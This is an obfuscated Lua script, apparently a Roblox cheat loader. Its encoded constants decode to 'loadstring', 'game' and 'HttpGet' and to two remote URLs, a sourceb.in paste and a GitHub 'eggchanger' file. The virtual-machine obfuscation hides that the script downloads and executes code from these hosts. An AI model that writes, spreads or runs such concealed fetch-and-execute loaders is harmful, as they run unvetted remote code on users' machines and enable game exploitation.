--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v81=0;local v82;while true do if (v81==0) then v82=v2(v0(v30,16));if v19 then local v103=0;local v104;while true do if (v103==1) then return v104;end if (v103==0) then v104=v5(v82,v19);v19=nil;v103=1;end end else return v82;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v83=(v31/((5 -3)^(v32-((1 + 1) -1))))%((3 -(878 -(282 + 595)))^(((v33-1) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v83-(v83%((2569 -(1523 + 114)) -(857 + 74))) ;else local v84=(570 -(367 + 201))^(v32-(928 -(214 + 641 + 72))) ;return (((v31%(v84 + v84))>=v84) and (1 -0)) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (1067 -(68 + 997)) );v18=v18 + (1272 -(226 + 1044)) ;return (v36 * 256) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + ((969 -(892 + 65)) -9) );v18=v18 + (121 -(32 + 85)) ;return (v40 * (16441815 + 335401)) + (v39 * (14533 + 51003)) + (v38 * 256) + v37 ;end local function v24() local v41=0 -0 ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==(1 -0)) then v44=1 -0 ;v45=(v20(v43,351 -(87 + 263) ,200 -(67 + 113) ) * ((2 + (0 -0))^((96 -(10 + 8)) -46))) + v42 ;v41=2 + 0 ;end if (v41==(11 -8)) then if (v46==((3661 -2709) -(802 + 150))) then if (v45==0) then return v47 * 0 ;else local v105=0;while true do if (v105==(0 -(442 -(416 + 26)))) then v46=1 -0 ;v44=0 + 0 ;break;end end end elseif (v46==(3044 -(915 + 82))) then return ((v45==((0 -0) -0)) and (v47 * ((1 + 0)/((0 + 0) -0)))) or (v47 * NaN) ;end return v8(v47,v46-(2210 -(1069 + 118)) ) * (v44 + (v45/((4 -2)^(113 -61)))) ;end if (v41==2) then v46=v20(v43,21,31);v47=((v20(v43,6 + 26 )==1) and  -1) or 1 ;v41=4 -1 ;end if (v41==(0 + (0 -0))) then v42=v23();v43=v23();v41=792 -((806 -(145 + 293)) + 423) ;end end end local function v25(v48) local v49;if  not v48 then v48=v23();if (v48==(430 -(44 + 386))) then return "";end end v49=v3(v16,v18,(v18 + v48) -(1487 -(998 + 488)) );v18=v18 + v48 ;local v50={};for v65=1 + 0 , #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return 0;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do if (v51~=1) then else local v88=(function() return 0;end)();while true do if (v88==(258 -(190 + 68))) then v55=(function() return {};end)();v56=(function() return {v53,v54,nil,v55};end)();v88=(function() return 1 + 0 ;end)();end if ((1 + 0)==v88) then v57=(function() return v23();end)();v51=(function() return 398 -(115 + 281) ;end)();break;end end end if (v51~=0) then else local v89=(function() return 0;end)();while true do if (v89==1) then v54=(function() return {};end)();v51=(function() return 1;end)();break;end if (v89~=(0 -0)) then else v52=(function() return function(v106,v107,v108) local v109=(function() return 1850 -(1409 + 441) ;end)();local v110=(function() return;end)();while true do if (v109==(0 + 0)) then v110=(function() return 0 -0 ;end)();while true do if (0~=v110) then else local v178=(function() return 718 -(15 + 703) ;end)();while true do if (v178==0) then v106[v107-#"," ]=(function() return v108();end)();return v106,v107,v108;end end end end break;end end end;end)();v53=(function() return {};end)();v89=(function() return 3 -2 ;end)();end end end if (v51==3) then for v92= #"[",v23() do local v93=(function() return v21();end)();if (v20(v93, #"}", #">")==(867 -(550 + 317))) then local v99=(function() return 0 + 0 ;end)();local v100=(function() return;end)();local v101=(function() return;end)();local v102=(function() return;end)();while true do if (v99~=(441 -(262 + 176))) then else if (v20(v101, #"-19", #"xnx")== #"\\") then v102[ #".dev"]=(function() return v58[v102[ #"?id="]];end)();end v53[v92]=(function() return v102;end)();break;end if (v99==0) then v100=(function() return v20(v93,1723 -(345 + 1376) , #"19(");end)();v101=(function() return v20(v93, #"asd1",694 -(198 + 490) );end)();v99=(function() return 1;end)();end if (v99==(286 -(134 + 151))) then v102=(function() return {v22(),v22(),nil,nil};end)();if (v100==(0 -0)) then local v158=(function() return 1206 -(696 + 510) ;end)();local v159=(function() return;end)();while true do if (v158~=(0 -0)) then else v159=(function() return 0;end)();while true do if (v159==0) then v102[ #"asd"]=(function() return v22();end)();v102[ #"0313"]=(function() return v22();end)();break;end end break;end end elseif (v100== #"{") then v102[ #"91("]=(function() return v23();end)();elseif (v100==(2 -0)) then v102[ #"asd"]=(function() return v23() -((3 -1)^(1278 -(1091 + 171))) ;end)();elseif (v100== #"19(") then local v184=(function() return 0 + 0 ;end)();while true do if (v184~=0) then else v102[ #"asd"]=(function() return v23() -((6 -4)^(52 -36)) ;end)();v102[ #"?id="]=(function() return v22();end)();break;end end end v99=(function() return 376 -(123 + 251) ;end)();end if (v99==(2 + 0)) then if (v20(v101, #"|", #"[")== #"!") then v102[2 + 0 ]=(function() return v58[v102[2]];end)();end if (v20(v101,9 -7 ,700 -(208 + 490) )== #"[") then v102[ #"91("]=(function() return v58[v102[ #"xxx"]];end)();end v99=(function() return 1 + 2 ;end)();end end end end for v94= #"~",v23() do v54,v94,v28=(function() return v52(v54,v94,v28);end)();end return v56;end if (v51~=(1 + 1)) then else local v90=(function() return 0;end)();local v91=(function() return;end)();while true do if (v90~=0) then else v91=(function() return 0 + 0 ;end)();while true do if ((836 -(660 + 176))==v91) then v58=(function() return {};end)();for v121= #"!",v57 do local v122=(function() return 1000 -(451 + 549) ;end)();local v123=(function() return;end)();local v124=(function() return;end)();local v125=(function() return;end)();while true do if (v122~=(1 + 0)) then else v125=(function() return nil;end)();while true do if ((0 + 0)~=v123) then else v124=(function() return v21();end)();v125=(function() return nil;end)();v123=(function() return 203 -(14 + 188) ;end)();end if (v123~=(676 -(534 + 141))) then else if (v124== #"!") then v125=(function() return v21()~=(0 + 0) ;end)();elseif (v124==(1386 -(746 + 638))) then v125=(function() return v24();end)();elseif (v124== #"xnx") then v125=(function() return v25();end)();end v58[v121]=(function() return v125;end)();break;end end break;end if (v122~=(0 + 0)) then else v123=(function() return 0 + 0 ;end)();v124=(function() return nil;end)();v122=(function() return 1 + 0 ;end)();end end end v91=(function() return 1 -0 ;end)();end if ((342 -(218 + 123))~=v91) then else v56[ #"nil"]=(function() return v21();end)();v51=(function() return 4 -1 ;end)();break;end end break;end end end end end local function v29(v59,v60,v61) local v62=v59[(2320 -(542 + 196)) -(1535 + 46) ];local v63=v59[2 + 0 ];local v64=v59[1 + 2 ];return function(...) local v67=v62;local v68=v63;local v69=v64;local v70=v27;local v71=(327 + 234) -(306 + 254) ;local v72= -(1 + 0);local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v85=0 -(0 + 0) ,v75 do if (v85>=v69) then v73[v85-v69 ]=v74[v85 + (1468 -(899 + 568)) ];else v77[v85]=v74[v85 + 1 ];end end local v78=(v75-v69) + 1 + 0 ;local v79;local v80;while true do v79=v67[v71];v80=v79[2 -1 ];if ((v80<=(608 -((574 -306) + 335))) or (4372==1850)) then if (v80<=((86 + 206) -(60 + 230))) then if ((232<821) and (v80<=(572 -(426 + 146)))) then v71=v79[1 + 2 ];elseif ((518<902) and (v80==(1457 -(282 + 1174)))) then local v126;local v127,v128;local v129;local v130;v77[v79[813 -(569 + 242) ]]=v61[v79[(5 + 3) -5 ]];v71=v71 + 1 ;v79=v67[v71];v130=v79[1 + 1 ];v129=v77[v79[1027 -(255 + 451 + 318) ]];v77[v130 + (1252 -(721 + 530)) ]=v129;v77[v130]=v129[v79[1275 -(945 + 326) ]];v71=v71 + (2 -1) ;v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 + 0 ;v79=v67[v71];v77[v79[702 -(271 + 429) ]]=v79[3 + 0 ]~=((3952 -2452) -(1408 + 92)) ;v71=v71 + (1087 -(461 + 357 + 268)) ;v79=v67[v71];v130=v79[2];v127,v128=v70(v77[v130](v13(v77,v130 + 1 ,v79[(2798 -1507) -(993 + 295) ])));v72=(v128 + v130) -1 ;v126=0 + (0 -0) ;for v162=v130,v72 do v126=v126 + (1172 -(418 + 753)) ;v77[v162]=v127[v126];end v71=v71 + (2 -1) + 0 ;v79=v67[v71];v130=v79[1 + 1 ];v77[v130]=v77[v130](v13(v77,v130 + 1 + (0 -0) ,v72));v71=v71 + 1 + 0 + 0 ;v79=v67[v71];v77[v79[531 -(406 + (1674 -(1126 + 425))) ]]();v71=v71 + (1770 -(1749 + 20)) ;v79=v67[v71];v77[v79[2]]=v61[v79[(406 -(118 + 287)) + 2 ]];v71=v71 + (1323 -(1249 + (826 -(239 + 514)))) ;v79=v67[v71];v77[v79[1 + 0 + 1 ]]=v61[v79[1148 -(466 + 679) ]];v71=v71 + (2 -(3 -2)) ;v79=v67[v71];v130=v79[2];v129=v77[v79[(1337 -(797 + 532)) -5 ]];v77[v130 + ((3022 -(118 + 1003)) -(106 + 606 + 1188)) ]=v129;v77[v130]=v129[v79[2 + 2 ]];else for v165=v79[1 + (2 -1) ],v79[(1210 -(373 + 829)) -5 ] do v77[v165]=nil;end end elseif ((2994>858) and (v80<=3)) then v77[v79[2]]();elseif (v80==(10 -(383 -(142 + 235)))) then do return;end else local v149=114 -(4 + 110) ;local v150;local v151;while true do if (((1316 -(476 + 255)) -(57 + 527))==v149) then v77[v150 + 1 ]=v151;v77[v150]=v151[v79[1431 -(41 + 1386) ]];break;end if ((v149==((467 -364) -(17 + 86))) or (3755<=915)) then v150=v79[(1132 -(369 + 761)) + 0 ];v151=v77[v79[6 -3 ]];v149=2 -1 ;end end end elseif ((3946>3743) and (v80<=(174 -(122 + 44)))) then if (v80<=(10 -4)) then v77[v79[6 -(3 + 1) ]]=v79[3 + 0 ];elseif (v80>(2 + 2 + 3)) then v77[v79[3 -1 ]]=v61[v79[68 -(30 + 35) ]];else local v154=v79[2];v77[v154]=v77[v154](v13(v77,v154 + 1 ,v72));end elseif (v80<=((12 -5) + 2)) then local v114=1257 -(1043 + 214) ;local v115;local v116;local v117;local v118;while true do if (v114==(0 -0)) then v115=v79[1214 -(323 + (1866 -(553 + 424))) ];v116,v117=v70(v77[v115](v13(v77,v115 + (2 -1) ,v79[583 -(361 + 219) ])));v114=321 -(53 + (505 -238)) ;end if ((v114==1) or (1335>=3306)) then v72=(v117 + v115) -(1 + 0) ;v118=(780 -367) -(15 + 398) ;v114=984 -(18 + 964) ;end if (v114==(7 -5)) then for v168=v115,v72 do v118=v118 + 1 ;v77[v168]=v116[v118];end break;end end elseif (v80>10) then if (v77[v79[2]]==v79[3 + 0 + 1 ]) then v71=v71 + 1 + 0 ;else v71=v79[853 -(20 + 830) ];end else v77[v79[2 + 0 ]]=v79[3]~=((125 + 1) -((354 -(64 + 174)) + 10)) ;end v71=v71 + 1 + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063Q00028Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403283Q00682Q7470733A2Q2F63646E2E736F75726365622E696E2F62696E732F6167686F49396E4A4E7A2F30034A3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F47726F7744757065722F652Q676368616E6765722F726566732F68656164732F6D61696E2F652Q67001B3Q0012063Q00014Q0002000100013Q00260B3Q00020001000100044Q00020001001206000100013Q00260B000100050001000100044Q00050001001208000200023Q001201000300033Q00202Q00030003000400122Q000500056Q000600016Q000300066Q00023Q00024Q00020001000100122Q000200023Q00122Q000300033Q00202Q000300030004001206000500064Q0009000300054Q000700023Q00022Q000300020001000100044Q001A000100044Q0005000100044Q001A000100044Q000200012Q00043Q00017Q00",v9(),...);
